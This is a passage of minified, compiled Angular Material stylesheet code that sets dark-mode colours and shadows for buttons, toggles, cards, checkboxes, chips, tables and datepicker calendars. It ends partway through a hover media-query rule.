.darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff;background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#212121;color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#ffffff4d;background-color:#000}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-card[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-card-subtitle[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#303030}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#303030!important}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#303030}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked)   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#616161;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled)   .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:white}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   thead[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   tbody[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   tfoot[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-header-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-footer-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}.darkMode[_ngcontent-%COMP%]   mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   th.mat-header-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   td.mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-header-cell[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-footer-cell[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-arrow[_ngcontent-%COMP%]{fill:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-next-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-table-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-cell-content[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#fff;border-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-disabled[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#ffffff3d}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > 